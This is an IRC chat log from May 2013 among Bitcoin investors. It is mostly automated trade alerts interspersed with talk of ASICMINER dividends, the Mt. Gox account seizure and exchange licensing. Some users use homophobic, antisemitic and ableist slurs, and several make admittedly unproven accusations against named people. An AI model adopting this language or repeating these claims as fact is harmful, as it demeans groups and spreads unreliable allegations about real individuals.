8.076 BTC [-] May 15 15:55:21 [BTCTC] [ASICMINER-PT] 1 @ 1.7299 BTC [+] May 15 15:56:35 [BTCTC] [ASICMINER-PT] 1 @ 1.73 BTC [+] May 15 15:57:33 [BTCTC] [TAT.ASICMINER] 60 @ 0.017319 = 1.0391 BTC [-] May 15 15:58:49 [BTCTC] [TAT.ASICMINER] 15 @ 0.01732 = 0.2598 BTC [+] May 15 15:59:19 [BTCTC] [TAT.ASICMINER] 190 @ 0.0172 = 3.268 BTC [-] May 15 15:59:33 [BTCTC] [PAJKA.BOND] 2 @ 0.10271 = 0.2054 BTC [-] May 15 16:00:38 [BTCTC] [PAJKA.BOND] 1 @ 0.1027 BTC [-] May 15 16:03:32 [BTCTC] [TAT.ASICMINER] 116 @ 0.01732 = 2.0091 BTC [+] May 15 16:03:46 [BTCTC] [TAT.ASICMINER] 33 @ 0.01733 = 0.5719 BTC [+] May 15 16:07:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.01733 BTC [+] May 15 16:16:00 [BTCTC] [ASICMINER-PT] 1 @ 1.729899 BTC [-] May 15 16:16:17 [BTCTC] [ASICMINER-PT] 1 @ 1.7299 BTC [+] May 15 16:16:24 [BTCTC] [ASICMINER-PT] 1 @ 1.73 BTC [+] May 15 16:17:00 https://bitcointalk.org/index.php?topic=205881.0 May 15 16:17:06 if anyone has bitfloor debt they wish to unload. May 15 16:18:05 [BTCTC] [ASICMINER-PT] 1 @ 1.694789 BTC [-] May 15 16:19:07 too bad nobody is buying bitcoinica debt May 15 16:19:08 lol May 15 16:24:06 aww May 15 16:25:24 i can buy it, for 1 satoshi May 15 16:27:18 http://i39.tinypic.com/16llp9u.jpg May 15 16:27:19 ahahaha May 15 16:32:44 [BTCTC] [ASICMINER-PT] 1 @ 1.69418 BTC [-] May 15 16:33:24 [BTCTC] [ASICMINER-PT] 1 @ 1.69418 BTC [-] May 15 16:35:02 [BTCTC] [ASICMINER-PT] 1 @ 1.694179 BTC [-] May 15 16:39:22 [BTCTC] [TAT.ASICMINER] 25 @ 0.017 = 0.425 BTC [-] May 15 16:39:24 [BTCTC] [BASIC-MINING] 1 @ 0.4299 BTC [+] May 15 16:39:40 [BTCTC] [BASIC-MINING] 5 @ 0.44 = 2.2 BTC [+] May 15 16:40:15 [BTCTC] [BASIC-MINING] 2 @ 0.45 = 0.9 BTC [+] May 15 16:40:15 http://gigaom.com/2013/05/14/google-ventures-invests-in-opencoin-the-firm-behind-bitcoin-exchange-ripple/ May 15 16:40:18 [MPEX] [S.MPOE] 421 @ 0.00067001 = 0.2821 BTC [-] May 15 16:40:21 [MPEX] [S.MPOE] 7311 @ 0.00067 = 4.8984 BTC [-] May 15 16:40:39 [BTCTC] [BASIC-MINING] 1 @ 0.464999 BTC [+] May 15 16:40:50 [BTCTC] [TAT.ASICMINER] 15 @ 0.017 = 0.255 BTC [-] May 15 16:40:58 awesome May 15 16:41:18 may my 40k ripples make me rich off of idiots some day May 15 16:41:20 no good is the word May 15 16:42:38 basically these people are dedicated to doing absolutely anything and everything, no matter how stupid or pointless May 15 16:42:43 just as long as they don't have to submit. May 15 16:42:53 fine. crushing mericanz is fun anyway. May 15 16:42:54 [BTCTC] [PAJKA.BOND] 1 @ 0.1039 BTC [+] May 15 16:43:15 [BTCTC] [PAJKA.BOND] 19 @ 0.104 = 1.976 BTC [+] May 15 16:43:33 [BTCTC] [PAJKA.BOND] 12 @ 0.105 = 1.26 BTC [+] May 15 16:48:03 [HAVELOCK] [ASICM] 150 @ 0.0166999 = 2.505 BTC [+] May 15 16:48:40 go go gadget ripple May 15 16:54:02 [HAVELOCK] [ASICM] 20 @ 0.016 = 0.32 BTC [-] May 15 16:56:18 [BTCTC] [ASICMINER-PT] 1 @ 1.733993 BTC [+] May 15 16:56:32 i havent dug deep into ripple, but tell me if i have this right May 15 16:56:59 [MPEX] [S.MPOE] 12689 @ 0.00067 = 8.5016 BTC [-] May 15 16:57:01 [MPEX] [S.MPOE] 1950 @ 0.00066941 = 1.3053 BTC [-] May 15 16:57:03 [MPEX] [S.MPOE] 1092 @ 0.00066932 = 0.7309 BTC [-] May 15 16:57:18 [BTCTC] [ASICMINER-PT] 1 @ 1.733994 BTC [+] May 15 16:57:24 [BTCTC] [ASICMINER-PT] 1 @ 1.734 BTC [+] May 15 16:57:31 it's a premined, centralized carrier currency for trust, this trust can, and has already, been gamed by people giving out trust where none was do "like me and i'll like you bacl" May 15 16:57:40 is that about right? May 15 16:57:53 due* May 15 17:00:33 mircea_popescu, mr. chairman sir, how are you this evening? May 15 17:00:48 ThickAsThieves just about. May 15 17:01:00 thestringpuller i am investigating this security breach at my log sauna May 15 17:01:09 http://p.gw.gd/view/783a0cd8 May 15 17:01:36 log sauna? May 15 17:01:39 security breach? May 15 17:01:52 sweatin' the logs again mp? don't strain so much. May 15 17:01:54 yeah, there's the expo[nential] sauna which is covered in glass and shows are made there May 15 17:02:06 and the log[arithmic] sauna which is all private May 15 17:02:13 actually it's designated the most secure place in timisoara May 15 17:02:56 haha. May 15 17:03:08 TAKE MY ROBE! May 15 17:03:12 speaking of "shows" your skit is slated for production, we should wrap by june May 15 17:03:46 [BTCTC] [ASICMINER-PT] 1 @ 1.758997 BTC [+] May 15 17:04:07 [BTCTC] [ASICMINER-PT] 1 @ 1.758998 BTC [+] May 15 17:04:49 a cool! May 15 17:05:12 deadweasel if you're confused, -pr has all teh details : https://bitcointalk.org/index.php?topic=206003.msg2155170#msg2155170 May 15 17:09:37 "Princess Pokemon Oliver Usagi the IVXth" lol May 15 17:10:46 IVX... wait whut May 15 17:11:04 [HAVELOCK] [HIM] 8 @ 2.1 = 16.8 BTC [-] May 15 17:12:17 Google I/O starts in a couple hours May 15 17:12:33 mircea_popescu: why does the link to brave new world link to 1984? May 15 17:12:35 GOOG at $908 May 15 17:12:36 is that like.... May 15 17:12:39 a joke? May 15 17:12:51 [BTCTC] [ASICMINER-PT] 1 @ 1.757999 BTC [-] May 15 17:12:59 thestringpuller yep May 15 17:13:11 [BTCTC] [ASICMINER-PT] 1 @ 1.758 BTC [+] May 15 17:13:20 wtf happend there May 15 17:13:50 Brave New World is the most awesome book evvvvaaaaar!!!!! May 15 17:14:07 where is TAT.GOOG-PT May 15 17:14:08 Anything written by a person named Aldous is wonderful. May 15 17:14:13 hmmm May 15 17:14:36 Scrat, people would be like wtf no dividends? May 15 17:14:42 ^ May 15 17:14:45 [BTCTC] [TAT.ASICMINER] 50 @ 0.017348 = 0.8674 BTC [+] May 15 17:14:51 [BTCTC] [TAT.ASICMINER] 20 @ 0.017355 = 0.3471 BTC [+] May 15 17:15:00 [BTCTC] [TAT.ASICMINER] 15 @ 0.017362 = 0.2604 BTC [+] May 15 17:15:10 they'd also wanna see my ameritrade account May 15 17:15:25 yeah, the judge would. May 15 17:15:28 hehe May 15 17:15:34 i'm jk May 15 17:15:41 why so serious May 15 17:16:22 have you ever danced with the devil in the pale moonlight? - Prince May 15 17:16:38 thanks for the details mircea_popescu May 15 17:16:42 ThickAsThieves: uh isn't that Jack Nicholson? May 15 17:16:44 my sauna just has naked people in it. May 15 17:16:47 hehehe May 15 17:16:56 it's also in the Prince song for the batman movie May 15 17:17:08 I want whatever you guys are smoking May 15 17:17:13 like immediately May 15 17:17:18 deadweasel that works better with female people than with sausagefests. May 15 17:17:25 just coffee and coconut bacon here May 15 17:18:43 coconut bacon? ThickAsThieves i need nto know moar. May 15 17:19:04 (it's not meat) May 15 17:19:12 it's faggoty pretend-bacon May 15 17:19:28 http://www.phoneybaloneys.com/bacon/ May 15 17:19:28 what are you a jew? May 15 17:19:36 worse, a vegan May 15 17:19:55 cancer May 15 17:19:57 lawl May 15 17:21:20 [BTCTC] [ASICMINER-PT] 1 @ 1.72 BTC [-] May 15 17:21:37 wow May 15 17:21:38 [BTCTC] [TAT.ASICMINER] 50 @ 0.017362 = 0.8681 BTC [+] May 15 17:22:07 [BTCTC] [ASICMINER-PT] 3 @ 1.72 = 5.16 BTC [-] May 15 17:22:08 mircea_popescu: a conference in Timisoara May 15 17:22:11 ? May 15 17:22:12 :D May 15 17:22:43 thestringpuller what do you mean ? May 15 17:23:02 [BTCTC] [ASICMINER-PT] 1 @ 1.701003 BTC [-] May 15 17:23:19 April 18th 2014 May 15 17:23:27 a that. yeah. May 15 17:23:40 I shall call my travel agent! May 15 17:23:45 [BTCTC] [ASICMINER-PT] 1 @ 1.701002 BTC [-] May 15 17:23:51 iirc i highlighted you when i announced here a week or so ago May 15 17:23:55 get registered! May 15 17:24:21 I gotta wait on smickles to release my coin :( May 15 17:24:27 [BTCTC] [ASICMINER-PT] 1 @ 1.701 BTC [-] May 15 17:24:49 ;;seen smickles May 15 17:24:49 smickles was last seen in #bitcoin-assets 5 weeks, 5 days, 22 hours, 42 minutes, and 15 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm May 15 17:25:08 [BTCTC] [ASICMINER-PT] 1 @ 1.7005 BTC [-] May 15 17:25:22 just go to an atm thestringpuller, smickles is ready May 15 17:25:54 I wonder what happened to him. May 15 17:26:01 [BTCTC] [ASICMINER-PT] 1 @ 1.7 BTC [-] May 15 17:28:04 [MPEX] [S.MPOE] 4321 @ 0.00067036 = 2.8966 BTC [+] May 15 17:28:11 [MPEX] [S.MPOE] 16518 @ 0.00067052 = 11.0756 BTC [+] May 15 17:28:12 [MPEX] [S.MPOE] 2909 @ 0.00067084 = 1.9515 BTC [+] May 15 17:33:21 [BTCTC] [ASICMINER-PT] 1 @ 1.700011 BTC [+] May 15 17:35:01 [BTCTC] [ASICMINER-PT] 1 @ 1.700012 BTC [+] May 15 17:35:51 [BTCTC] [ASICMINER-PT] 1 @ 1.700011 BTC [-] May 15 17:35:56 [BTCTC] [ASICMINER-PT] 1 @ 1.70001 BTC [-] May 15 17:36:43 [BTCTC] [ASICMINER-PT] 10 @ 1.7 = 17 BTC [-] May 15 17:40:06 [BTCTC] [ASICMINER-PT] 1 @ 1.694 BTC [-] May 15 17:40:21 [BTCTC] [ASICMINER-PT] 6 @ 1.687474 = 10.1248 BTC [-] May 15 17:40:47 [BTCTC] [ASICMINER-PT] 4 @ 1.685 = 6.74 BTC [-] May 15 17:43:49 "Nature isn't run by naturologists so why do you expect an economy to be run by economists?" May 15 17:43:54 [BTCTC] [ASICMINER-PT] 1 @ 1.600011 BTC [-] May 15 17:44:15 [BTCTC] [ASICMINER-PT] 15 @ 1.60001 = 24.0002 BTC [-] May 15 17:46:10 [BTCTC] [PAJKA.BOND] 4 @ 0.106 = 0.424 BTC [+] May 15 17:46:26 [BTCTC] [ASICMINER-PT] 7 @ 1.7 = 11.9 BTC [+] May 15 17:47:29 [BTCTC] [ASICMINER-PT] 3 @ 1.7 = 5.1 BTC [+] May 15 17:51:25 very nice am div this time May 15 17:52:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.017362 = 0.1736 BTC [+] May 15 17:52:33 0.03622241 it's reported May 15 17:52:36 i cant verify yet May 15 17:53:38 ??? May 15 17:53:40 Holy shit, if true that is massive May 15 17:53:43 fuck me if tru May 15 17:53:50 0.03622241 per share May 15 17:53:54 verified May 15 17:54:08 wow May 15 17:55:17 [MPEX] [S.MPOE] 13800 @ 0.00066932 = 9.2366 BTC [-] May 15 17:55:50 huh May 15 17:56:12 the beauty of a goldrush frenzy ^^ May 15 17:56:54 wow, insane May 15 17:57:25 [BTCTC] [S.DICE-PT] 825 @ 0.00358 = 2.9535 BTC [+] May 15 17:57:58 15k for the week as it were ? pretty good. May 15 17:58:13 don't get used to it ;) May 15 17:58:49 we are only 20% now, wait until its hard for us to be under 50% May 15 17:59:01 not like bfl is going to ship... May 15 17:59:04 [BTCTC] [ASICMINER-PT] 1 @ 1.7299 BTC [+] May 15 17:59:09 Havelock won't let me payout divs today May 15 17:59:10 lame May 15 17:59:12 this is mostly the item sales tho innit ? May 15 17:59:16 yes May 15 17:59:37 ;;calc .2 * 24 * 10 * 25 * 7 May 15 17:59:38 8400 May 15 17:59:40 [BTCTC] [ASICMINER-PT] 1 @ 1.735 BTC [+] May 15 17:59:45 about half of it anyway May 15 18:00:30 .015 from mining May 15 18:00:33 roughly May 15 18:01:26 [BTCTC] [TAT.ASICMINER] 19 @ 0.017362 = 0.3299 BTC [+] May 15 18:01:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.017362 BTC [+] May 15 18:03:01 so when we are 50% should be .045 from mining, good deal :) May 15 18:03:52 [BTCTC] [ASICMINER-PT] 1 @ 1.734997 BTC [-] May 15 18:04:22 lol May 15 18:04:47 inaba must be feeling a little vibration now at bfl HQ ^^ May 15 18:04:59 [BTCTC] [ASICMINER-PT] 1 @ 1.734998 BTC [+] May 15 18:06:01 [BTCTC] [ASICMINER-PT] 1 @ 1.738 BTC [+] May 15 18:06:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.017362 = 0.0868 BTC [+] May 15 18:06:57 you know inaba has asics already... May 15 18:07:07 he does not give a fuck about the rest of you May 15 18:07:16 infact i bet his delaying only will make him more money May 15 18:07:34 [BTCTC] [ASICMINER-PT] 1 @ 1.734 BTC [-] May 15 18:07:34 proof? May 15 18:08:07 i dont need proof to believe that May 15 18:08:23 i know some of the guys that have bfl already and are not open about it May 15 18:08:31 and if they do, i know inaba has May 15 18:08:39 but no proof May 15 18:08:55 bfl has been sending some stuff to people who ordered mining rigs May 15 18:08:56 [BTCTC] [ASICMINER-PT] 2 @ 1.739999 = 3.48 BTC [+] May 15 18:09:22 lol from the forum "Clearly MPOE-PR was right and Asicminer is a dying company. All dying companies give out massive dividends and increase in share value right?" May 15 18:09:58 [BTCTC] [ASICMINER-PT] 1 @ 1.739 BTC [-] May 15 18:10:04 well, climax is almost here May 15 18:10:10 [BTCTC] [TAT.ASICMINER] 12 @ 0.017374 = 0.2085 BTC [+] May 15 18:10:14 "+1! I can't wait to see the divs when the USB miners go on sale... " May 15 18:10:40 at least its more fair than ngz pulled May 15 18:10:45 on his 'investors' May 15 18:11:16 :) May 15 18:11:18 than what ngz pulled* May 15 18:11:28 [BTCTC] [ASICMINER-PT] 9 @ 1.72 = 15.48 BTC [-] May 15 18:12:41 [BTCTC] [ASICMINER-PT] 1 @ 1.739998 BTC [+] May 15 18:13:06 AM pulled some BFL-esque promises, but can lull investors with fat divs atm :P May 15 18:14:06 Soo apparently you can throw together a miner in about 16 hours with an ASIC chip available and a bread board... May 15 18:14:19 consumes twice the power, but you still get the same hash rates... May 15 18:14:19 well AM has had some delays, in a way, AM said it would have this much hasing power at such a date, and it did, just not a site to use the electric and what not.. so May 15 18:14:30 but anyway meh, they is kicking ass and well its fucking awesome May 15 18:14:35 "blabla our share trading platform will be innovative ....blabla 12 TH at bla date for suurah...." May 15 18:14:40 weekly awesome dividends May 15 18:14:54 fuck $50,000 a week? i dont even know what to do May 15 18:15:11 [BTCTC] [ASICMINER-PT] 1 @ 1.739 BTC [-] May 15 18:15:17 blackjack and hookers ;) May 15 18:15:29 yes May 15 18:15:41 anyway im off to the second of the two May 15 18:15:43 you get 50,000 a week on AM div's? May 15 18:15:54 Chaaang-Noi: I thought oyu had a wife... May 15 18:16:21 [MPEX] [S.MPOE] 588 @ 0.00066932 = 0.3936 BTC [-] May 15 18:16:22 [MPEX] [S.MPOE] 15150 @ 0.0006689 = 10.1338 BTC [-] May 15 18:16:24 [MPEX] [S.MPOE] 2362 @ 0.00066853 = 1.5791 BTC [-] May 15 18:16:37 i do :) May 15 18:17:06 been away long enough, i might be back in 2 hours or soo, peace (just had to see the div payments, fuck yeah!!, better than sex) see ya May 15 18:17:16 [BTCTC] [ASICMINER-PT] 2 @ 1.74 = 3.48 BTC [+] May 15 18:17:18 [BTCTC] [ASICMINER-PT] 8 @ 1.74 = 13.92 BTC [+] May 15 18:17:39 isnt it a bit late May 15 18:17:40 for that May 15 18:17:44 watch out thai supanode :P May 15 18:17:50 maybe i'll just sell what i have for a nice profit May 15 18:17:59 seems like a nice time to exit May 15 18:20:03 [HAVELOCK] [ASICM] 46 @ 0.0166999 = 0.7682 BTC [+] May 15 18:20:06 [BTCTC] [ASICMINER-PT] 1 @ 1.739 BTC [-] May 15 18:20:43 [MPEX] [S.MPOE] 10338 @ 0.00066853 = 6.9113 BTC [-] May 15 18:20:45 [MPEX] [S.MPOE] 5762 @ 0.00066691 = 3.8427 BTC [-] May 15 18:22:10 [BTCTC] [ASICMINER-PT] 1 @ 1.758 BTC [+] **** BEGIN LOGGING AT Wed May 15 18:48:19 2013 May 15 18:48:49 ;;ticker May 15 18:48:51 BTCUSD ticker | Best bid: 115.30609, Best ask: 115.62000, Bid-ask spread: 0.31391, Last trade: 115.30608, 24 hour volume: 168113.46314795, 24 hour low: 103.01847, 24 hour high: 119.77000, 24 hour vwap: 111.31196 May 15 18:48:54 heh May 15 18:51:24 [BTCTC] [ASICMINER-PT] 2 @ 1.759997 = 3.52 BTC [+] May 15 18:53:02 [HAVELOCK] [ASICM] 557 @ 0.0166999 = 9.3018 BTC [+] May 15 18:53:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.01737 BTC [+] May 15 18:54:02 [HAVELOCK] [ASICM] 150 @ 0.01669996 = 2.505 BTC [+] May 15 18:55:25 [BTCTC] [ASICMINER-PT] 1 @ 1.7595 BTC [-] May 15 18:55:33 http://sports.yahoo.com/news/bitcoin-%E2%80%93-the-new-way-to-bet-online--161411695.html# May 15 18:55:59 [BTCTC] [TAT.ASICMINER] 4 @ 0.01737 = 0.0695 BTC [+] May 15 18:57:03 o ya, very new. May 15 18:57:27 http://arstechnica.com/tech-policy/2013/05/feds-reveal-the-search-warrant-that-seized-mt-gox-account/ May 15 18:57:33 and bitcoin and gambling are somehow in yahoo sports May 15 18:57:34 hehe May 15 18:58:02 [HAVELOCK] [ASICM] 226 @ 0.0167 = 3.7742 BTC [+] May 15 18:58:04 MP, should you go link BitBet in the comments?\ May 15 18:58:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.01737 BTC [+] May 15 18:59:00 "Homeland Security used a confidential informant, based in Maryland, to conduct the investigation. The informant simply created accounts with Dwolla and Mt. Gox, bought bitcoins, and then changed them back into dollars. Tracing that money, HSI was able to see that the money passed through a Wells Fargo account, number 7657841313, which was created by a single authorized singer: Mark May 15 18:59:00 Karpeles, the president and CEO of Mt. Gox. The account shows transfers to Dwolla going back to at least December 2011, according to the warrant. May 15 18:59:00 The special agent then explains what appears to be the smoking gun: Karpeles specifically denied he was going to get into the currency exchange business. " May 15 18:59:02 deadweasel butwhay May 15 18:59:40 glad this is a gox thing, and not a dwolla, btc/usd thing May 15 18:59:43 ThickAsThieves exactly. we'll be finding out how the japanese forced repatriation works. May 15 19:00:04 but fundamentally karpeles gets to sit in a jail cell and meditate over his "mpex is illegal" bs. May 15 19:00:10 in the comments of the yahoo article, for more traffic May 15 19:00:18 deadweasel i have more traffic than yahoo. May 15 19:01:00 i figured it would be a good targeted place for those who want to place bets, but don't know where or how. May 15 19:01:14 mebbe. May 15 19:01:22 tbh i don't think someone who doesn't know btc can use bitbet May 15 19:01:42 a motivated gambler is more likely to learn. May 15 19:02:07 yahoo is still in business? May 15 19:02:20 as much as geocities is. May 15 19:05:00 [BTCTC] [ASICMINER-PT] 1 @ 1.45 BTC [-] May 15 19:05:03 [HAVELOCK] [ASICM] 600 @ 0.0167 = 10.02 BTC [+] May 15 19:05:31 word. May 15 19:06:02 [HAVELOCK] [ASICM] 100 @ 0.0167 = 1.67 BTC [+] May 15 19:07:36 angelfire? May 15 19:08:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.01737 BTC [+] May 15 19:09:01 yahoo is actually doing much better May 15 19:09:12 now that a former googler is running it May 15 19:09:21 [BTCTC] [ASICMINER-PT] 2 @ 1.7595 = 3.519 BTC [+] May 15 19:09:31 however it seems they are trying to get into bed with Apple May 15 19:09:38 which is dangerous imo May 15 19:10:08 funny also, is that Mark is probably in bed May 15 19:10:13 and when he wakes up May 15 19:10:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.01737 BTC [+] May 15 19:10:35 will issue statement "No one told me anything, we leanred news from net, we take this seriously" May 15 19:10:41 like all the other ones May 15 19:10:51 [BTCTC] [ASICMINER-PT] 2 @ 1.7595 = 3.519 BTC [+] May 15 19:11:43 [BTCTC] [ASICMINER-PT] 10 @ 1.76 = 17.6 BTC [+] May 15 19:11:58 [BTCTC] [ASICMINER-PT] 1 @ 1.76 BTC [+] May 15 19:12:15 mp: you are right and thanks for the good advice..im out of there. Where there's smoke, there's fire. May 15 19:12:35 I'm just not sure if btc-e is any better. May 15 19:12:45 try campbx May 15 19:12:51 they could use the volume... May 15 19:12:52 isnt that U.S.? May 15 19:12:55 yes May 15 19:13:04 i assume you deal in USD May 15 19:13:13 you might be better off working with a US company May 15 19:13:14 [BTCTC] [ASICMINER-PT] 15 @ 1.76 = 26.4 BTC [+] May 15 19:13:23 that actually has great incentive to behave May 15 19:13:34 i dont endorse campbx May 15 19:13:38 just theorizing May 15 19:13:51 right, but any U.S. btc exchange will be frozen from what i understand May 15 19:14:04 many folks say "nothing U.S.- use foreign exchanges" May 15 19:14:09 you dont understand then May 15 19:14:18 prolly not i must be missing something May 15 19:14:21 DHS didnt say that May 15 19:14:36 they are accusing Gox of passing money into unlicensed accounts May 15 19:14:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.01737 = 0.0347 BTC [+] May 15 19:14:52 like literally money laundering May 15 19:15:02 [HAVELOCK] [ASICM] 74 @ 0.0167 = 1.2358 BTC [+] May 15 19:15:02 maybe they really were? May 15 19:15:07 we don't know that they weren't May 15 19:15:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.01737 = 0.0521 BTC [+] May 15 19:15:37 i assume they are May 15 19:15:52 instant transfers to dwolla? May 15 19:16:04 [BTCTC] [ASICMINER-PT] 1 @ 1.710008 BTC [-] May 15 19:16:22 instant as in coffee May 15 19:16:25 they were moving money into a personal Wells Fargo account May 15 19:16:46 hah thats my bank May 15 19:17:15 it is May 15 19:17:46 [BTCTC] [ASICMINER-PT] 1 @ 1.710007 BTC [-] May 15 19:18:03 [HAVELOCK] [ASICM] 500 @ 0.01694 = 8.47 BTC [+] May 15 19:18:35 truffles: what do you think about campbx May 15 19:18:37 [BTCTC] [TAT.ASICMINER] 88 @ 0.017374 = 1.5289 BTC [+] May 15 19:19:45 [BTCTC] [ASICMINER-PT] 1 @ 1.71 BTC [-] May 15 19:20:12 [BTCTC] [TAT.ASICMINER] 4 @ 0.01738 = 0.0695 BTC [+] May 15 19:21:03 [HAVELOCK] [ASICM] 32 @ 0.017189 = 0.55 BTC [+] May 15 19:21:04 [HAVELOCK] [ASICM] 150 @ 0.01719 = 2.5785 BTC [+] May 15 19:21:06 [HAVELOCK] [ASICM] 108 @ 0.0172 = 1.8576 BTC [+] May 15 19:21:13 [BTCTC] [ASICMINER-PT] 3 @ 1.774424 = 5.3233 BTC [+] May 15 19:21:41 cambx seems trustworthy enough May 15 19:21:46 afaik they havent had any major issues May 15 19:22:18 [BTCTC] [ASICMINER-PT] 1 @ 1.7835 BTC [+] May 15 19:23:02 [HAVELOCK] [ASICM] 1 @ 0.0172 BTC [+] May 15 19:23:04 [HAVELOCK] [ASICM] 15 @ 0.0172 = 0.258 BTC [+] May 15 19:23:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.01738 BTC [+] May 15 19:23:53 [BTCTC] [ASICMINER-PT] 1 @ 1.4 BTC [-] May 15 19:25:12 Where is burnside? May 15 19:25:20 Haven't seen him around in a while May 15 19:26:36 [BTCTC] [ASICMINER-PT] 1 @ 1.774 BTC [+] May 15 19:27:03 [HAVELOCK] [ASICM] 1 @ 0.0172 BTC [+] May 15 19:27:03 [HAVELOCK] [ASICM] 250 @ 0.01725 = 4.3125 BTC [+] May 15 19:27:12 [BTCTC] [S.DICE-PT] 3 @ 0.00358 = 0.0107 BTC [+] May 15 19:27:17 [BTCTC] [ASICMINER-PT] 1 @ 1.769 BTC [-] May 15 19:29:10 does japan have extradition treaty with usa? May 15 19:29:21 [MPEX] [S.MPOE] 8291 @ 0.00067084 = 5.5619 BTC [+] May 15 19:29:38 ;;google japan extradition treaty usa May 15 19:29:39 List of United States extradition treaties - Wikipedia, the free ...: ; Extradition Treaties between Japan and Other Countries ...: ; BILATERAL EXTRADITION TREATIES JAPAN Extradition TIAS ...: (1 more message) May 15 19:30:02 apparently it does Enky May 15 19:30:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.01738 BTC [+] May 15 19:31:12 [BTCTC] [ASICMINER-PT] 1 @ 1.773999 BTC [+] May 15 19:32:52 kakobrekla karpeles is an american May 15 19:32:56 no extradition necessary May 15 19:33:09 hmm? May 15 19:33:17 you mean isnt? May 15 19:33:35 just rendition May 15 19:33:45 your country can always ask for you back May 15 19:34:02 [HAVELOCK] [ASICM] 50 @ 0.01726 = 0.863 BTC [+] May 15 19:34:55 [BTCTC] [ASICMINER-PT] 5 @ 1.77399 = 8.87 BTC [-] May 15 19:36:02 [HAVELOCK] [ASICM] 150 @ 0.01739 = 2.6085 BTC [+] May 15 19:37:23 [BTCTC] [ASICMINER-PT] 1 @ 1.773989 BTC [-] May 15 19:38:18 kerpeles finally going to jail:) May 15 19:39:27 Effect of non compliance with MSB State License in the USA? May 15 19:39:27 - Failure to comply with US State money services licensing requirements could result in up to five years in prison and a fine up to $250,000...for each violation. The specifics can be found in 18 USC 1960 "Prohibition of Unlicensed Money Transmitting Businesses": May 15 19:39:59 [BTCTC] [ASICMINER-PT] 20 @ 1.774 = 35.48 BTC [+] May 15 19:40:01 ya but he is a frenchie in japan May 15 19:40:02 Enky im sure they're going to tack wire fraud in there somewhere May 15 19:40:05 ...each violation May 15 19:40:07 ouch May 15 19:40:10 plus conspiracy seeing how that'd be darn easy to prove May 15 19:40:11 wire fraud is up to 20 yrs of jail May 15 19:40:41 I believe conspiracy is hard to prove. May 15 19:40:51 Enky any one person still waiting for their funds could testify for that. such as https://bitcointalk.org/index.php?topic=179586.msg2155341#msg2155341 May 15 19:41:03 [HAVELOCK] [ASICM] 50 @ 0.017398 = 0.8699 BTC [+] May 15 19:41:04 KRS-1 conspiracy is the easiest to prove, are you kidding ? May 15 19:41:22 He's probably in big shit. Japan does enforce U.S. judgements. May 15 19:41:40 so can anyone weigh in as to whether CampBx might suffer the same fate? May 15 19:41:49 maximian he's in one of those positions where his only practical way is finding someone bigger to rat on May 15 19:41:53 im sure it probably could May 15 19:41:57 is there a way to look up if they are properly licensed etc May 15 19:42:00 luckily most of the larger players had enough sense to listen and gtfo May 15 19:42:03 is anyone aware of any US exchnages that are 100% legal? May 15 19:42:07 if any didn't... well... May 15 19:42:13 It's his name on the registration documents though May 15 19:42:38 ThickAsThieves afaik the only properly licensed exchange was bitcoion=-central May 15 19:42:39 it sunk. May 15 19:42:52 i dont think legal btc in states is even possible May 15 19:42:56 Maybe he'll get a suspended sentence if he's lucky, but he'll probably have to resign from mt. gox May 15 19:43:05 he will sell it May 15 19:43:09 nobody will buy. May 15 19:43:18 the customer base could be interesting May 15 19:43:18 it must be possible May 15 19:43:22 he has nothing to sell. his engine is a laughingstock, his brand name is like enron's May 15 19:43:24 people deal in currencies all the time May 15 19:43:25 too late for him now. May 15 19:43:39 and cash as well May 15 19:43:45 ThickAsThieves people. not retarded children with neckbeards. people. May 15 19:43:48 [BTCTC] [TAT.ASICMINER] 5 @ 0.0173 = 0.0865 BTC [-] May 15 19:43:58 not coders. not 20yo. not card traders. people./ May 15 19:44:41 is there a way to look up if CampBX is properly licensed etc May 15 19:44:49 ThickAsThieves not on the internet. May 15 19:45:26 this is what your lawyers do for you during that dd mysterious activity. May 15 19:45:38 [BTCTC] [TAT.ASICMINER] 13 @ 0.0173 = 0.2249 BTC [-] May 15 19:45:41 They go by Bulbul Investments, LLC, Alpharetta, GA May 15 19:46:34 Bulbul Investments LLC in Alpharetta, GA is a private company categorized under Merchandise Brokers. May 15 19:46:38 thats not good... May 15 19:47:29 well May 15 19:47:32 i dunno May 15 19:47:36 bitcoins are things May 15 19:47:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.0173 = 0.0865 BTC [-] May 15 19:47:59 yes, Money Service Business things. May 15 19:49:04 ga is georgia state? May 15 19:49:08 yes May 15 19:49:14 https://dbfweb.dbf.state.ga.us/WebCCData.html May 15 19:49:30 so is btc-e -> bank transfer USD to meh ok? May 15 19:49:30 found nothing for bulbul investments May 15 19:50:21 so what did i miss? May 15 19:50:41 there are 10 registered companies in Alpharetta May 15 19:50:47 i dont see that one of campbx May 15 19:51:07 alpha retta? wtf? May 15 19:51:11 also May 15 19:51:32 Alpharetta Georgia, U.S.A. (Been there, nice place) May 15 19:51:46 campbx is not registered as MSB May 15 19:51:48 what does retta mean? May 15 19:51:55 Apharetta is a name May 15 19:51:59 +l May 15 19:52:13 krs-1 you is the smrt May 15 19:52:20 lol May 15 19:52:28 I'm sexy too. May 15 19:52:48 but how many XRP do you have? And are you a meganode? May 15 19:52:56 anyone happen to know what retta means? just off hand if you know id like to know May 15 19:53:04 yes May 15 19:53:08 [BTCTC] [ASICMINER-PT] 1 @ 1.779 BTC [+] May 15 19:53:11 it doesn't mean anything, it's a diminutive formation May 15 19:53:13 it's simply a feminine designatin May 15 19:53:20 like ette May 15 19:53:23 albert, alberta, alberetta. May 15 19:53:34 i thought so but was not sure May 15 19:53:49 iv seen it so many places before May 15 19:54:26 [BTCTC] [TAT.ASICMINER] 25 @ 0.01701 = 0.4253 BTC [-] May 15 19:54:31 [BTCTC] [TAT.ASICMINER] 25 @ 0.017 = 0.425 BTC [-] May 15 19:54:33 [BTCTC] [TAT.ASICMINER] 25 @ 0.0169 = 0.4225 BTC [-] May 15 19:54:37 [BTCTC] 